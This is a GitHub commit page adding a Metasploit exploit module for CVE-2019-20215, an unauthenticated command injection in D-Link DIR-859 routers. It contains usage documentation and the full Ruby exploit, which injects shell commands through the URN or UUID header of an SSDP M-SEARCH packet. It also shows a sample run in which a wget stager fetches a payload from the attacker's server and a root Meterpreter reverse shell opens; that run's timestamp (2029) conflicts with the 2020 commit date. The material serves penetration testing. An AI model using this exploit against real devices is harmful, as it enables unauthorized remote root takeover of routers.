Skip to content
Permalink
Browse files

Land #12887, add dlink ssdpcgi cmd inject

  • Loading branch information
space-r7 committed Feb 5, 2020
2 parents aad0ab3 + 691a18c commit a154efa25068c3e798c58402d8147fb4a273f181
@@ -0,0 +1,46 @@
## Vulnerable Application

### Introduction

This module exploits CVE-2019–20215, an unauthenticated remote injection of operating system commands.
The vulnerability was found in the ssdpcgi() function, and the payload can be injected through either the UUID
or URN headers of a M-SEARCH UPnP request.

Get a [D-Link router/vulnerable firmware](https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10147),
or download firmware versions 1.06 or 1.05 and run them on firmadyne or similar emulation frameworks.

## Verification Steps

1. Set up router/emulated device
2. Start `msfconsole`
3. Do: `use exploit/linux/http/dlink_dir859_exec_ssdpcgi`
4. Do: `set RHOSTS <router_ip>`
5. Do: `set LHOST <local_ip>`
6. Do: `set TARGET <URN/UUID>`
7. Do: `run`
8. You should get a session as `root`.

## Options

**VECTOR**

This option denotes which header will be used in the request (UUID or URN)
that triggers the vulnerability.

## Scenarios

### D-link DIR-859 Firmware 1.05

```
msf5 exploit(linux/http/dlink_dir859_exec_ssdpcgi) > run
[*] Started reverse TCP handler on 192.168.0.2:4444
[*] Using URL: http://0.0.0.0:8080/38YWEX2
[*] Local IP: http://192.168.70.28:8080/38YWEX2
[*] Target Payload URN
[*] Client 192.168.0.1 (Wget) requested /38YWEX2
[*] Sending payload to 192.168.0.1 (Wget)
[*] Command Stager progress - 100.00% done (110/110 bytes)
[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.1:41057) at 2029-12-31 14:15:22 -0300
[*] Server stopped.
meterpreter >
```
@@ -0,0 +1,76 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::Udp
include Msf::Exploit::CmdStager

def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi',
'Description' => %q{
D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi.
},
'Author' =>
[
's1kr10s',
'secenv'
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2019-20215'],
['URL', 'https://medium.com/@s1kr10s/2e799acb8a73']
],
'DisclosureDate' => 'Dec 24 2019',
'Privileged' => true,
'Platform' => 'linux',
'Arch' => ARCH_MIPSBE,
'DefaultOptions' =>
{
'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp',
'CMDSTAGER::FLAVOR' => 'wget',
'RPORT' => '1900'
},
'Targets' =>
[
[ 'Auto', { } ],
],
'CmdStagerFlavor' => %w{ echo wget },
'DefaultTarget' => 0
))

register_options(
[
Msf::OptEnum.new('VECTOR',[true, 'Header through which to exploit the vulnerability', 'URN', ['URN', 'UUID']])
])
end

def exploit
execute_cmdstager(linemax: 1500)
end

def execute_command(cmd, opts)
type = datastore['VECTOR']
if type == "URN"
print_status("Target Payload URN")
val = "urn:device:1;`#{cmd}`"
else
print_status("Target Payload UUID")
val = "uuid:`#{cmd}`"
end

connect_udp
header = "M-SEARCH * HTTP/1.1\r\n"
header << "Host:239.255.255.250: " + datastore['RPORT'].to_s + "\r\n"
header << "ST:#{val}\r\n"
header << "Man:\"ssdp:discover\"\r\n"
header << "MX:2\r\n\r\n"
udp_sock.put(header)
disconnect_udp
end
end

0 comments on commit a154efa

Please sign in to comment.
You can’t perform that action at this time.